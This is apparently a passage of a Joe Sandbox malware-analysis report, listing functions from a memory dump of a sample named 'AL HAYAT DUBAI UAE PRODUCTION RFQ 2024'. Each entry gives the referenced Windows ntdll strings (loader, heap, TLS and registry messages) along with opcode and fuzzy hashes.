LdrpResMapFile Exit, xrefs: 016932B7

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: 51f29cdb428bffc637df20f383e824a4092ea0f6b71d7e0a0eac4155471632c1
Instruction ID: 6681f4d0cf0b1846ddff25dd403ec0af6d01a1a3a71291ae93e070f6e0021210
Opcode Fuzzy Hash: 51f29cdb428bffc637df20f383e824a4092ea0f6b71d7e0a0eac4155471632c1
Instruction Fuzzy Hash: 3D818D71648341AFEB21DB28CC44B6ABBE9FF84B50F04496DFA819B390DB74D900CB56

Function 0160B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 0160B385
LdrpResGetResourceDirectory Exit, xrefs: 0160B397
{, xrefs: 016635BD

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: ec7b30467bb6c0938c82cfb717ec906a49c87ff8e2f34363ee5011fe564841a6
Instruction ID: f04f927627fb0f43a65377b1d825314979a65bcc107d07336a0a272f7b46166b
Opcode Fuzzy Hash: ec7b30467bb6c0938c82cfb717ec906a49c87ff8e2f34363ee5011fe564841a6
Instruction Fuzzy Hash: C491DE75A05259CBEB2ACF58CC407AEBBB4FF00324F188599E915AB3D0D3799E41CB90

Function 016DB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 016DB3AA
GlobalizationUserSettings, xrefs: 016DB3B4
TargetNtPath, xrefs: 016DB3AF

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 1a06f5f4cc09b54f564346faf54725b7dce1dfea72357d6ac79d1904d7e2804e
Instruction ID: 0165d3a357fe1d9794ba5443abc7ee5456312ef083f5ef8dc1a4127741bfca52
Opcode Fuzzy Hash: 1a06f5f4cc09b54f564346faf54725b7dce1dfea72357d6ac79d1904d7e2804e
Instruction Fuzzy Hash: B361C632D41229ABDB31DF54CC88BD9B7B5BB19710F4201E9EA08AB250DB74DE84CF94

Function 01629723 Relevance: 3.9, Strings: 3, Instructions: 179COMMON

Download Yara Rule

Strings

Unmapping DLL "%wZ", xrefs: 0166DAEE
minkernel\ntdll\ldrsnap.c, xrefs: 0166DAFF
LdrpUnloadNode, xrefs: 0166DAF5

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 0-2283098728
Opcode ID: 27931b1788cf2c60c3a771d4c76ad5d9af637ebddad3f33775d10ee55e219654
Instruction ID: f3bbd425371b38a5ee7aad127bf353810ceb6add87c8175a28d610a68c54b306
Opcode Fuzzy Hash: 27931b1788cf2c60c3a771d4c76ad5d9af637ebddad3f33775d10ee55e219654
Instruction Fuzzy Hash: FE510331700B329BD725EF38CC84A3977A2BBD4718F180A2DE5528B795E7B09805CF96

Function 015FF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0165E442
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0165E455
HEAP[%wZ]: , xrefs: 0165E435

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: ab4c7f9ebfb733eedb5746368633b0ed1c80406a65213680892d5fdfc4c8d303
Instruction ID: 3283e15d992af8df0ccc087a9e3b705ad016fc79ad77c29b2f3a171019518046
Opcode Fuzzy Hash: ab4c7f9ebfb733eedb5746368633b0ed1c80406a65213680892d5fdfc4c8d303
Instruction Fuzzy Hash: A251F732644685AFE726CBA8CC84F5AFBF8FF04714F0444A9E6818B752D374EA44C750

Function 01621514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 0166A39D
minkernel\ntdll\ldrmap.c, xrefs: 0166A3A7
Could not validate the crypto signature for DLL %wZ, xrefs: 0166A396

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: e9999404550999a3c438f18aec2c41258543e75166a38944b55fc498112ff0c9
Instruction ID: c1c1ba9a47dd7c1cf15e88658674be828e723a7270fa007267d7641d87c69cb6
Opcode Fuzzy Hash: e9999404550999a3c438f18aec2c41258543e75166a38944b55fc498112ff0c9
Instruction Fuzzy Hash: 56512570A08B559BE722CF9CCC44B2A7BE5BB02710F1842D9E952BB3D2D770E901CB44

Function 015F753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0165AD47
Invalid address specified to %s( %p, %p ), xrefs: 0165AD5A
HEAP[%wZ]: , xrefs: 0165AD3A

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 9c0d0e1b72b9d7d33e87ae06af42356e7e8fc508bd58d4422648b97074aa56fa
Instruction ID: 86bd04b7d6d2b17afbec636fe01184b5d01996ee3df646b8414e6a44e9bfebcf
Opcode Fuzzy Hash: 9c0d0e1b72b9d7d33e87ae06af42356e7e8fc508bd58d4422648b97074aa56fa
Instruction Fuzzy Hash: 0241F6352402808FEF75DF5CC8847B97BE1BF09204F2846ADDB868F656CB65D445CB21

Function 016315EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 01671954
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 01671943
LdrpAllocateTls, xrefs: 0167194A

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: e8396f3557c371ac4a9fff580f388b7d6dceac53ca2cbb4af4e029920c78d654
Instruction ID: e90a0588ee3bdf514a072f9d3df193a5c6e128e9ca2f453ee57f65f771968b38
Opcode Fuzzy Hash: e8396f3557c371ac4a9fff580f388b7d6dceac53ca2cbb4af4e029920c78d654
Instruction Fuzzy Hash: 0C416975A00205AFDB15DFA9CC41BAEBBF6FF99300F09812DE506A7351D735A901CB54

Function 016843D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01684519
LdrpCheckRedirection, xrefs: 0168450F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01684508

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: e3b0a553760357c367d76d2b9358b7e6dd3c8af427d0604bc244bfc260d6edb3
Instruction ID: 6fd6bf6df22948b9742a9dc957c1ed3ebfca1d697d4f4b9f0a919f47f1a5c6a0
Opcode Fuzzy Hash: e3b0a553760357c367d76d2b9358b7e6dd3c8af427d0604bc244bfc260d6edb3
Instruction Fuzzy Hash: 0541A1326066129BCB21EF5CDC40B267BE5EF48650F0A076DED59D7356EB30E801CB91

Function 016332C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

Actx , xrefs: 016332CC
RtlCreateActivationContext, xrefs: 01672803
SXS: %s() passed the empty activation context data, xrefs: 01672808

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: f1fc951d9c14a5ded62066d47ccb342e3e109bccf07d76e8ba8e05636719a258
Instruction ID: e6c0b32d400e65b3cf95898898d52f53c7751e3523ac2746e202de0c23747b39
Opcode Fuzzy Hash: f1fc951d9c14a5ded62066d47ccb342e3e109bccf07d76e8ba8e05636719a258
Instruction Fuzzy Hash: 423123726006059BEB16DE68DC90B9A7BE5FB94710F15846CFD059F381DB71D80AC7D0

Function 0168B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 0168B2F0
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0168B2B2
GlobalFlag, xrefs: 0168B30F

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 80ec2867d443df9beedbe0704b9c5a9f60ba7b7d0ba92223299eb28043196098
Instruction ID: 4e65b916065a47f3a302a3ed14852fb46f719e33f13bc9c788190fb58156dda5
Opcode Fuzzy Hash: 80ec2867d443df9beedbe0704b9c5a9f60ba7b7d0ba92223299eb28043196098
Instruction Fuzzy Hash: 60314DB1E00209AFDB10EF94DC90AEEBBBDEF54744F5405ADEA01AB241D7749E448BA4

Function 01631527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 0167185B
LdrpInitializeTls, xrefs: 01671851
DLL "%wZ" has TLS information at %p, xrefs: 0167184A

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 957c91b29ed9f9f52d37cff65e18c59d676f5ec1470efa5f7f0ede012ca75598
Instruction ID: f48c828b155a29db60ec1a685e093aafcd29b9bd317af613a1dc5b3aae13b50b
Opcode Fuzzy Hash: 957c91b29ed9f9f52d37cff65e18c59d676f5ec1470efa5f7f0ede012ca75598
Instruction Fuzzy Hash: 9D3105B2E10201ABE7209F99CC85F6A7BB9FB86768F06012DE507A72C0D770ED018794

Function 01641190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0164119B
@, xrefs: 016411C5
BuildLabEx, xrefs: 0164122F

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: ed6b182d45871d893a502d2c843c4ee5b7e2fd9cd0f9e3cf153b3977f149c1f2
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: 9D31A4B290061ABBDB11EB94CC44EAFBBBEEB95724F104029FA15E7250D730DA45CB94

Function 016151C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 01615365
@, xrefs: 016154C3

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 1b006c4b3d19b7a787de58d69ef921a0f837912c3bccf71d9de80ecc362168b8
Instruction ID: f6e93c5daf9589ead083327f456421a3584c48552d6acad24ab1208be2e0800c
Opcode Fuzzy Hash: 1b006c4b3d19b7a787de58d69ef921a0f837912c3bccf71d9de80ecc362168b8
Instruction Fuzzy Hash: 23328B715083518BD7248F19C890B7EFBE6EFCA704F18891EFA9687294E734D845CB92

Function 0167E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0167E3D1
Legacy, xrefs: 0167E3DA

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 44396a07baf0d61beee2c21c86c0fcdf410e288aadcf2f43e4d8cacf350e245a
Instruction ID: 16ef1532d48f351ca7316eeb6ed439521bcf919a394a1aa25fb86f68e583651c
Opcode Fuzzy Hash: 44396a07baf0d61beee2c21c86c0fcdf410e288aadcf2f43e4d8cacf350e245a
Instruction Fuzzy Hash: 46616D71A006199FEB25DFA8CC40BADBBF9FB44700F1440ADE649EB241E732E945CB54

Function 016DB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 016DB5C4
RedirectedKey, xrefs: 016DB60E

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: 96bd1b91e6a0c2414b03ee0bc0e894d916c734b47db312c118813630bdcb016f
Instruction ID: 25e44b38abcff0661b61e3b60f6fe369a05fd589009d2d823813476e3a7fe424
Opcode Fuzzy Hash: 96bd1b91e6a0c2414b03ee0bc0e894d916c734b47db312c118813630bdcb016f
Instruction Fuzzy Hash: 756117B5C01219EBDF21DF98CC48AEEBFB8FB09714F16405AE905A7204DB749A49DF90

Function 01600485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01600586
kLsE, xrefs: 016005FE

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 21dbb17f1b9a3a0a1920e507d6cfbf9c69aa9558bc4835a8b1664893462156e3
Instruction ID: 2cb7fa157c3846d45cf3b41c55eff5a006285b1af40c5db52dd85934e9acdead
Opcode Fuzzy Hash: 21dbb17f1b9a3a0a1920e507d6cfbf9c69aa9558bc4835a8b1664893462156e3
Instruction Fuzzy Hash: 7E51A171A00746DFDB2ADFA8CD407ABB7F9AF44340F10483EE69687281E7759605CB61

Function 0160A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0160A21B
RtlpResUltimateFallbackInfo Exit, xrefs: 0160A229

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: cd83f38e1263920036b97ee978d006ceefc562677079edf80b354084eb57d1f2
Instruction ID: edb26900f86d624c5d82b448ad76e7e2e362569320c2a62456521cdf8f720a98
Opcode Fuzzy Hash: cd83f38e1263920036b97ee978d006ceefc562677079edf80b354084eb57d1f2
Instruction Fuzzy Hash: C141D030A00755DBDB1ADF9ACC50B6ABBB8FF85790F1885A9E940DB391E336D901CB11

Function 0169314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 0169317C
LdrResGetRCConfig Exit, xrefs: 0169318E

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 0d0ef89379ae9c916b349bc6767d448d50c016510e641ed3966f0c8f1fa05bbf
Instruction ID: f128b04a3c4a44c399c3265891fd2dce17ab1246a205997adbf7e0176503c35f
Opcode Fuzzy Hash: 0d0ef89379ae9c916b349bc6767d448d50c016510e641ed3966f0c8f1fa05bbf
Instruction Fuzzy Hash: 8D31DC312187418BE725DB68DC44B2ABBE9FF84714F0848AEF955CB390EB30D905CB56

Function 016331BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 016331D5
@, xrefs: 0163322D

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 5bb979a97b60007805ce2a4178df63923e29a304e7aefaa84f7bcc6afac2100c
Instruction ID: e43a73b9de4d4d310dcb67d422134c56eef2fd4ca946d57625fc868f1959e0ce
Opcode Fuzzy Hash: 5bb979a97b60007805ce2a4178df63923e29a304e7aefaa84f7bcc6afac2100c
Instruction Fuzzy Hash: 453154B2508301AFC321DE28C880A6BBBE8FBC5654F04492EF99583350E734DD09CBA2

Function 016333D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 0167289A
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0167289F

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 8e12685b7ba205850c060b09c46d354e4a09fda5dfa32941dddd76557c0b9bc6
Instruction ID: 6a255db207e47a0988c09b996c15ed154bd9f96e6169d2eeb2d39605d9b8910a
Opcode Fuzzy Hash: 8e12685b7ba205850c060b09c46d354e4a09fda5dfa32941dddd76557c0b9bc6
Instruction Fuzzy Hash: F6110272F01205ABE7298A4D8C41F6ABAE9EBC8B10F15802DBA04AB345DA75CD0183A4

Function 0163A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0163A504
Threadpool!, xrefs: 0163A509

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 6d4c1323532ff2d242f6a8a853b4ef72afcecc8d682a398ef67c5b886005176e
Instruction ID: 3bc11aa0e09bbfd897e7fb950b6413a99f61754584a97925fbd267067d793690
Opcode Fuzzy Hash: 6d4c1323532ff2d242f6a8a853b4ef72afcecc8d682a398ef67c5b886005176e
Instruction Fuzzy Hash: 9601ADB2251700AFD321DF54CD05B227BE8F780B25F00893DE698CB6A0E774D900DB46

Function 0163A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 016765D4

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 6196d7598b8190d48dd63fbcd392fc6b38636760dcfb08ec4f5bef9aeb0282cf
Instruction ID: 3e8a8b95b3a6aa995d5e5e69e141a8f3b8d06ddcb7b35a5f2c5425f55a5ae638
Opcode Fuzzy Hash: 6196d7598b8190d48dd63fbcd392fc6b38636760dcfb08ec4f5bef9aeb0282cf
Instruction Fuzzy Hash: 42718E75E0061A9FEF28CFACC9906EDBBB2BF88710F14812EE905A7345E7718941DB54

Function 016102F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#%u, xrefs: 01664B8F

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: a7164f1009a311ece9ba60240bc10499f7f9301953f439ebe8740fa3955297e5
Instruction ID: 672b1db0a10554e924903a0fdebe6692000aabd58500131a3775a65caf1c4d5d
Opcode Fuzzy Hash: a7164f1009a311ece9ba60240bc10499f7f9301953f439ebe8740fa3955297e5
Instruction Fuzzy Hash: 8C714971A0010A9FDB05DFA9DD84BAEBBF9BF18704F184069E901E7355EB34E941CBA4

Function 0168F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 0168F4E7

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction ID: b19c1f9addd044f5430b87bf342fff9c45618ca9618cf689b5eaba90e4b58e1f
Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction Fuzzy Hash: C151AD72504342AFE721AF18CC40F6BB7E8FBA4714F100A6DF64197290D7B5E904CBA6

Function 0161E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0161E5C4

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 159dfb566de7cea60651c58ed26a3133f6b5553359b4468a6c3f0aed9e416a94
Instruction ID: c1479161f711a07cfff835b4cd05ae771c2858536607f707ab8364b9ed1e3998
Opcode Fuzzy Hash: 159dfb566de7cea60651c58ed26a3133f6b5553359b4468a6c3f0aed9e416a94
Instruction Fuzzy Hash: 4A41E1726083229BD721DB69CC44B6BB7E8AFC8B04F480E2DF984D7284E735C904C796

Function 016341BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 01634220

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction ID: b0177434c20c05af6597ee636ce076b5b84ebe416e1ba062884cb0b055e4cf53
Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction Fuzzy Hash: 6051AA71101711AFC320DF19C840A6BBBF9FF88710F00892EFA96976A0E774E904CB95

Function 0167C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0167C3FF

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: dc6e960c849b158d9476c1c1f91c5b45dda03424b046164f6837b705ac12ddae
Instruction ID: 79326fd4c020b56ed3ada588eaa0c5a1cdc1ae06d3b0dee07558be871f404f02
Opcode Fuzzy Hash: dc6e960c849b158d9476c1c1f91c5b45dda03424b046164f6837b705ac12ddae
Instruction Fuzzy Hash: E54155B1D0152EABDB21DA54CC84FDEB77DAB54714F1045E9EB08AB141DB309E888FA8

Function 01689429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 016894F0

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

